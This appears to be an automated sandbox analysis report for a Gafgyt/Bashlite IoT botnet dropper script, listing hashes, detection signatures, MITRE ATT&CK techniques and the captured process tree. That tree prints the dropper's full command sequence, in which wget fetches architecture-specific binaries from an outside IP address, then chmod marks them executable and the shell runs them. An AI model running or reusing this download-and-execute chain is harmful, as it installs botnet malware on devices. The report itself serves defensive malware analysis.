gafgyt | cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7

Resubmissions

02-01-2025 21:56

250102-1tf52sxkfv 10

02-01-2025 12:45

250102-py3dasslds 10

Analysis

max time kernel
9s
max time network
12s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
02-01-2025 21:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.sh
Size

1KB
MD5

c393be1bb1bbee668b95b671620d63c0
SHA1

cce8f8abadfd7e5b74d20a8bce40468662e3ffa9
SHA256

cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7
SHA512

9bfc5bf1c69d34605942daa875afebd493047c715009639302aac56256abfe6619ba37715dcb493f137329517181c7d3ebbcfb1395ad5ac3ae7bec360c20f721

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 5 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
728	chmod
681	chmod
695	chmod
704	chmod
712	chmod
717	chmod
724	chmod

Executes dropped EXE 5 IoCs

ioc	pid	Process
/tmp/mips	683	mips
/tmp/mipsel	696	mipsel
/tmp/sh4	705	sh4
/tmp/arm61	718	arm61
/tmp/ppc	729	ppc

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	718	arm61

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
683	mips
686	rm
688	wget
696	mipsel
698	rm
670	wget

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/arm61	wget

/tmp/sex.sh
/tmp/sex.sh
1⤵
PID:666
- /usr/bin/wget
  wget http://31.13.224.110/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:670
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:683
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:686
- /usr/bin/wget
  wget http://31.13.224.110/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:688
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:695
- /tmp/mipsel
  ./mipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:696
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:698
- /usr/bin/wget
  wget http://31.13.224.110/sh4
  2⤵
  - Writes file to tmp directory
  PID:700
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:705
- /bin/rm
  rm -rf sh4
  2⤵
  PID:709
- /usr/bin/wget
  wget http://31.13.224.110/x86
  2⤵
  PID:710
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:712
- /tmp/x86
  ./x86
  2⤵
  PID:713
- /bin/rm
  rm -rf x86
  2⤵
  PID:714
- /usr/bin/wget
  wget http://31.13.224.110/arm61
  2⤵
  - Writes file to tmp directory
  PID:716
- /bin/chmod
  chmod +x arm61
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /tmp/arm61
  ./arm61
  2⤵
  - Executes dropped EXE
  - Changes its process name
  PID:718
- /bin/rm
  rm -rf arm61
  2⤵
  PID:721
- /usr/bin/wget
  wget http://31.13.224.110/i686
  2⤵
  PID:723
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/i686
  ./i686
  2⤵
  PID:725
- /bin/rm
  rm -rf i686
  2⤵
  PID:726
- /usr/bin/wget
  wget http://31.13.224.110/ppc
  2⤵
  - Writes file to tmp directory
  PID:727
- /bin/chmod
  chmod +x ppc
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/ppc
  ./ppc
  2⤵
  - Executes dropped EXE
  PID:729
- /bin/rm
  rm -rf ppc
  2⤵
  PID:731
- /usr/bin/wget
  wget http://31.13.224.110/586
  2⤵
  PID:732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/arm61

Filesize
136KB

MD5
cc2c559dcf0b6b8a969dfe141afcb8a7

SHA1
9a51751c74638501f9bc94ee0070d61fb8c952c3

SHA256
fbafa6393f825b6da94ea2b5517d759ff46564f563dba155f17a277683d75e1c

SHA512
aba1ad2c7d1e51c3c98d2704e58e92accff328df23dfa0b2a219fd8e3775af8ba2e93157765da943f1c49721ecba6340fb46691112deb841a9cafc0f4a10432b

Download Submit
/tmp/mips

Filesize
148KB

MD5
dce29bdff1efd8b56470beb84800f340

SHA1
29744f0f8a1bfb02606d00b5eafd029b6006e9aa

SHA256
ff80f728ab5574dd193e529d4cb4c5a062d7f57bea0de856722f6373e0235d60

SHA512
967c004b6341f97572cef3aba4baf5b5346aaa4c8d9731a21c8dfd9994d9f65895f8946235f7103f51888a442827f8b3675642686167cb99d5062f4d3cbcd651

Download Submit
/tmp/mipsel

Filesize
148KB

MD5
085aaca192395078f3266ad40ca3820e

SHA1
391c2a7bbd936e9de7c33ff8c31858a4a120fa54

SHA256
89ef04dea955b2724b47529801174a1a00b0533db594178efbb5888d37a87474

SHA512
15e98139c7bc0551bf6eb5dbdb07b5de07fe01b3e4a5ace72918adb1e36e071d0d3e606a8019c58e1275f4e57f2b0ece8dbdd58de4cb5f9f30512013fea6db0e

Download Submit
/tmp/ppc

Filesize
110KB

MD5
01a92f4cda4ed8855ba45ade51ee70b2

SHA1
a6b61a2b34500929b548657556c29d91896d0a08

SHA256
0c82739271f51c1040662ebc13805a749ac51c44e5355d60fb9fe1764efa2415

SHA512
cf44cacfcd1d0361757b4216334bdd3e9d5b8045ec48303c2e191cfc2fb8807744a0b382b078ad3225ae3c36f2d168aa4aa2abeebc58d9a30ed2882b6807506e

Download Submit
/tmp/sh4

Filesize
105KB

MD5
488d96eefc3e512cad6dbf9ead797b9d

SHA1
dc2352927d0928b2de6304bc1fd81332f35eebf4

SHA256
e4bbb9fb66fc81dd445f598147810ea8d76eb4799a79561403c0902bb192ad45

SHA512
9b9ae7893c692c3ffb679b47e2fcac3e3334d3f590ae026bf7c10122586a2a5e400a19ce4e414a4afe6f10da61dc2bbd0a14686cd48d6ea2d5e90d7a8bbe2ef9

Download Submit